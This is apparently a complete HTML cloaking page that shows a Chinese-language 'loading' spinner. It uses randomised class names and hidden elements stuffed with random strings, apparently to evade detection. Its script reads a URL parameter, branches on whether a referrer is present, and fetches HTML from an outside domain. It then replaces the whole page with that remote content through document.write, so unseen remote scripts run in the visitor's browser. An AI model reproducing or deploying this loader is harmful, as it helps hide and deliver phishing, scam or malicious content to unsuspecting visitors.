<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .C8MFYuGY {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .C8MFYuGY .YkT48B7fFAV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .C8MFYuGY .content {
            line-height: 50px;
            text-align: center
        }

        .C8MFYuGY .img {
            width: 100%
        }

        .C8MFYuGY .s8ehrLUky {
            text-align: center
        }

        .C8MFYuGY .s8ehrLUky span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .C8MFYuGY .s8ehrLUky span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .C8MFYuGY .s8ehrLUky span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .C8MFYuGY .s8ehrLUky span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .C8MFYuGY .s8ehrLUky span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .C8MFYuGY .s8ehrLUky span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .C8MFYuGY .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function guWEJvSsf0PL(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Mc0ad = guWEJvSsf0PL('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Mc0ad +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Mc0ad +".html?a=share";
		}
		
        CcW2eH2qQ=url+"#"+new Date().getTime();
        CcW2eH2qQ && function() {
            $.get(CcW2eH2qQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >pUQ3YnPqwZORif3MgxLqkbwvJ4RaqMYk6e0u</ul>
<h1 style='display:none' >AkYRe3I9vTxAOKqjU</h1>
<li style='display:none' >zLtWB8p1fuqQydxqHBhmAtzZG2k6ymnmFt5NGH8wByDONVNJiByzYqZrpH30Fjw5Q9phpoUz9es2brO6P</li>
<h1 style='display:none' >AkYRe3I9vTxAOKqjU</h1>
<span style='display:none'>OVmRRrv9NPYFZoQzaLYBgyQOcHBlLSWxKlvZJIP31oU5CCZXKYo1grk7riWlWjWoUxJeLXbcVP6</span>
<b style='display:none' >yLCo5VKzkK5UpsRzCViXkB5Vo4etPqv3fQ6P6gVa2kr3p93l6UNwKEfmX</b>
<a  href='#' style='display:none'>eNmNgw8yXmR7NQhlt</a>
<span style='display:none'>OVmRRrv9NPYFZoQzaLYBgyQOcHBlLSWxKlvZJIP31oU5CCZXKYo1grk7riWlWjWoUxJeLXbcVP6</span>
<ul style='display:none' >pUQ3YnPqwZORif3MgxLqkbwvJ4RaqMYk6e0u</ul><div class="C8MFYuGY">
    <div class="YkT48B7fFAV">
        <div class="s8ehrLUky">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >swaY5LJOKMVSAwtGzukDjR78FTsxGiyLTtIGl</li>
<div style='display:none'>C7cDyqsNHlU8Sm0fhPdgJsIgHJ5d</div>
<b style='display:none' >vRmHjqP6CyZR4fo9acoOeNvAW0Uu6dYoEq</b></body>
</html>